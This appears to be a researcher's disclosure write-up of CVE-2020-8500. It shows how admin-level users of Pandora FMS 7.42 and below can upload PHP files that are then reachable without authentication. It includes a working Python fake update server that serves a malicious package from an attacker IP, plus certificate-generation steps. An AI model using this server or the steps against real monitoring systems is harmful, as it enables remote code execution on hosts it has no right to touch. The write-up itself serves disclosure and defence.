PHP file upload and remote code execution in Pandora FMS <= 7.42 (Extension,Online/Offline Update) (CVE-2020-8500)
If you find it valuable, you can support me by making a donation. Donate now.
In Pandora FMS 742 and below it is possible to upload PHP files via the Extension Uploader and via the Online Installer. The enterprise edition offers the Offline installer as a feature. With the offline installer it is possible to do exactly the same.
What is allowed to a Web Admin and what is not?
It is not allowed to upload a PHP file even with an Admin account, because it is dangarous. (Vendor)
Key Topics
- The packages are not signed, there are no certificates in use.
- There are no cheksums in use.
- The Update Manager URL can be changed via the Web Application. (I think this parameter should be set during install and it can be stored in a config file.)
- The dangarous PHP functions are allowed here, because it is a Monitoring System.
- What about Man in the Middle Attacks?
- The uploaded files accessible without authentication.
- Directory Listing
I know a button on a webpage is comfortable, but security starts where comfortability ends. What is good for a Wordpress site, maybe it is not good for a Monitoring System.
Technical Details
Note: The vulnerabilities exploitable only with a Web Admin account.
1. Online Updater
The online updater is a simple thing. The update package is a simple "oum" file (Online Update Manager). This file is a zip file which can contain PHP files.
The Update Manager URL can be configured (Update Manager -> Update Manager Options). This URL works only with https!
Generating Pem files
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
Fake Pandora FMS Manager (You can execute it with python3 ./fake_pandorafms_https_server)
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
from io import BytesIO
import json
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'application/zip')
self.end_headers()
self.wfile.write(open('./k44.oum','rb').read())
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
response = BytesIO()
response.write(b'This is POST request. ')
response.write(b'Received: ')
response.write(body)
self.wfile.write(json.dumps([{ 'version': 'k4m1ll0_fake_version','file_name':'https://192.168.0.103:2000/k44.oum'}], ensure_ascii=False).encode())
httpd = HTTPServer(('0.0.0.0', 2000), SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="key.pem",
certfile='cert.pem', server_side=True)
httpd.serve_forever()
Preparing the update package
Configuring the URL to use my fake server
Checking updates
Install the Fake Update
Install - Success
Proof
Demo Video
Note: The installed files are accessible without authentication.
2. Extension Upload
admin tools->extension manager->extension uploader
- The vendor do not want to allow to us upload PHP files even with an Admin account.
- They allow to upload extensions and extensions are zipped PHP files.
- The extracted php files are accessible from outside without authentication.
Upload the "extension", which contains "k44_extension.php" file
The extracted file is accessible without Authentication.
Proof
Demo Video
3. Offline Updater
The offline updater works the same way as the online updater, the difference is just the uploading. The offline installer is an Enterprise feature now, but earlier it was part of the community edition. I performed the demo with the old version:
I used the same out file.
Upload
Update
Proof
Demo Video
© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved